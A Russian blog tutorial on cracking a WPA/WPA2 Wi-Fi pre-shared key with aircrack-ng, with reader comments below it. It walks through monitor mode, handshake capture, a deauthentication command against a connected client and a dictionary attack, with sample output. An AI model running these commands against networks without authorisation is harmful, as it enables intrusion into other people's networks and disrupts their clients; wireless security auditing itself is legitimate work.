Рейтинг@Mail.ru

Kali Linux Часть 3: Взламываем WI-FI при помощи Aircrack-ng (WPA\WPA2)

: в разделе: Open Source
42642

kali linux взлом wi fi wpa2

Привет всем! Прошло уже достаточно времени с моей последней статьи про Kali Linux. Теперь настало время для практики. И в этой статье мы попробуем "проверить на безопасность" свою собственную беспроводную точку доступа в интернет. И так, приступим...

Шаг 1 - запуск беспроводного интерфейса в режиме мониторинга

Цель этого шага в том, чтобы запустить вашу wi-fi карту в так называемом режиме мониторинга. Данный режим позволяет вам «слушать» все пакеты, т. е. Не только те которые адресованы вашей карте.

Точная процедура включения режима монитора отличается в зависимости от используемого драйвера. Для определения драйвера, выполните следующую команду:  

airmon-ng

На машине с Ralink, Atheros и Broadcom система выдаст примерно следующее:

Interface       Chipset         Driver
 
 rausb0          Ralink RT73     rt73
 wlan0           Broadcom        b43 - [phy0]
 wifi0             Atheros         madwifi-ng
 ath0             Atheros         madwifi-ng VAP (parent: wifi0)

Шаг 1а - Настройка MadWifi -NG

Сперва остановим ath0, выполнив:

airmon-ng stop ath0

Должно быть так:  

Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Выполните команду "iwconfig", чтобы убедиться в том, что больше никаких интерфейсов athX не запущено. Это должно выглядеть примерно так:  

 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.

Теперь введите следующую команду, чтобы переключить беспроводную карту на канал 9 в режиме мониторинга:


airmon-ng start wifi0 9

После этой команды мы должны увидеть что-то похожее на:  

Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Теперь убедимся что наш интерфейс правильно настроен, снова выполняем команду iwconfig

Ответ должен выглядеть так:  

lo        no wireless extensions.
 
 wifi0     no wireless extensions.
 
 eth0      no wireless extensions.
 
 ath0      IEEE 802.11g  ESSID:""  Nickname:""
        Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
        Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
        Retry:off   RTS thr:off   Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
        Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
        Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Шаг 1b - Настройка драйверов mac80211  

airmon-ng start wlan0 9

Interface       Chipset         Driver
 
 wlan0           Broadcom        b43 - [phy0]
                                 (monitor mode enabled on mon0)

Обратите внимание, что монитор включен на mon0.

Стадия 1С — Настройка прочих драйверов

Для других ( ieee80211 основе ) драйверов, просто выполните следующую команду, чтобы включить режим мониторинга (замените rausb0 вашим именем интерфейса):  

airmon-ng start rausb0 9

Результат

Interface       Chipset         Driver
 
 rausb0          Ralink          rt73 (monitor mode enabled)

Шаг 2 — Начало. Сбор хэндшейков.

Целью этого шага является сбор т. н. рукопожатий


Выполняем:  

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Где:     

  • -с 9 является каналом для беспроводной сети     
  • - BSSID 00:14:6 C: 7E : 40:80 является MAC адресом точки доступа.     
  • -w psk является префиксом имени файла вывода     
  • ath0 является именем нашего интерфейса.

Вот какой будет вывод если беспроводной клиент подключится к сети:

CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                               
  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116

А вот так если не подключится:

CH  9 ][ Elapsed: 4 s ][ 2007-03-24 17:51 
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51        0    0   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes       

Данный шаг может затянуться, и вам придется ждать пока кто-то из клиентов не подключится к точке доступа. Но думаю это не проблема.

На основании вывода Airodump-ng в предыдущем шаге, вам удалось определить клиента, который в данный момент подключен. Нам понадобится его MAC-адрес.

Откройте другой сеанс консоли и введите:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

Где:

  • -0 средство деаутентификации
  • 1 число деаутентификаций для отправки ( вы можете отправить несколько , если хотите)
  • -a 00:14:6C:7E:40:80 МАС-адрес точки доступа
  • -c 00:0F:B5:FD:FB:C2 МАС-адрес клиента которого мы обнаружили
  • ath0 имя интерфейса

Вот как будет выглядеть результат команды:  

11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

Шаг 4 — Aircrack-ng - взлом предварительного ключа

На данном этапе нам нужно взломать предварительный ключ WPA/WPA2. Чтобы сделать это, нам понадобиться словарь слов в качестве входных данных.

Существует небольшой словарь, который поставляется с aircrack-ng - “password.lst”. Будем использовать его.

Откройте другой сеанс консоли и введите:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Где:

    -w password.lst это имя файла словаря
    *.cap название группы файлов, содержащих перехваченные пакеты . Обратите внимание, что в данном случае мы использовали специальный символ *, чтобы включить несколько файлов.

Вот типичный вывод, когда нет хэндшейков:

Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.

 No valid WPA handshakes found.

Когда это происходит, вы должны либо повторить шаг 3 или ждать дольше, если вы используете пассивный подход.

Вот таким может быть вывод если хэндшейк будет найден:

 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.
 
 #  BSSID              ESSID                     Encryption

 1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)
 
 Choosing first network as target.

Теперь в этот момент, Aircrack-ng начнет пытаться взломать предварительный ключ. В зависимости от скорости вашего процессора и размера словаря, это может занять много времени.

Вот таким будет вывод при успешном взломе:

                               Aircrack-ng 0.8
 
 
                 [00:00:00] 2 keys tested (37.20 k/s)
 
 
                         KEY FOUND! [ 12345678 ]
 
 
    Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E 
                     B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD 
 
    Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 
                     CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 
                     FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 
                     2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 
 
    EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB 

Ну вот, ключ у нас. Беспроводная сеть проверена на безопасность ;)

0
Привязка к тегам kali Linux хак
  • Гость
    алексей Пятница, 29 Январь 2016

    ох ипать сверлить

  • Гость
    vasya Понедельник, 02 Январь 2017

    sposob ne rabotaet

  • Гость
    Сергей Четверг, 15 Февраль 2018

    Странный человек писал инструкцию.
    Выжимки какие-то. У автора абсолютно нет желание донести свои знания.
    Те кто умеют это делать, эта статья им не нужна. Те кто не умеют, эта статья ничем не поможет.
    Так для кого автор писал? Для себя?

  • Гость
    SherkhaN Пятница, 16 Февраль 2018

    Нее, нормальный способ. Я так ломал. Просто сука это процесс долгий и мощный комп нужен! Был бы квантовый компьютер, тогда все было бы на много быстрее)).

Оставить комментарий

Гость Вторник, 18 Сентябрь 2018